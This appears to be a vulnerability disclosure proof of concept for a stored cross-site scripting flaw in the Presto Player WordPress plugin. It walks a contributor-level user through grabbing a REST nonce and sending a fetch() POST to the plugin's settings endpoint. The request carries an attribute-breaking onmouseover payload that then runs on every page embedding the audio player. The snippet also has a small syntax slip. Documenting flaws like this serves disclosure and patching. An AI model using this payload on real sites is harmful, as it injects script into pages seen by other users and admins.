As a contributor, get a REST nonce by opening (when being logged in)

Then run the below command in the developer console of the web browser (still while being logged in as a contributor, and having put the nonce retrieved)

fetch("/wp-json/presto-player/v1/settings", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded"
  "method": "POST",
  "body": 'presto_player_branding[player_css]=123"onmouseover=alert(/XSS/)//&_wpnonce=<NONCE>',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

The XSS will be triggered in all pages when the Audio player is embed and the mouse is moved over it.